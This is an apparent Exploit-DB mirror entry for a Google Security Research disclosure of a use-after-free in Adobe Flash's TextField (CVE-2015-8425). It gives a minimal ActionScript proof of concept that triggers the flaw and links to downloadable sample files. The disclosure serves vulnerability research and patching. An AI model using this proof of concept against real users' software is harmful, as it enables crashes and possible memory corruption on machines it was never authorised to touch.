- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 39049
- Проверка EDB
-
- Пройдено
- Автор
- GOOGLE SECURITY RESEARCH
- Тип уязвимости
- DOS
- Платформа
- WINDOWS
- CVE
- cve-2015-8425
- Дата публикации
- 2015-12-18
Adobe Flash - 'TextField' Use-After Free
Код:
Source: https://code.google.com/p/google-security-research/issues/detail?id=583
If a TextField variable is set to a value with toString defined, and the TextField is updated, a use-after-free can occur if the toString method frees the TextField's parent. A minimal PoC is as follows:
var mc = this.createEmptyMovieClip("mc", 301);
var my_txt = mc.createTextField("my_txt", 302, 0, 0, 100, 100);
trace(my_txt);
my_txt.variable = "today_date";
mc.today_date = "blah";
var times = 0;
var date_interval:Number = setInterval(updateDate, 500);
function updateDate() {
mc.today_date = {toString : func};
}
function func(){
if(times == 0){
times++;
mc.removeMovieClip();
}
return "test";
}
A sample fla and swf are attached.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39049.zip
- Источник
- www.exploit-db.com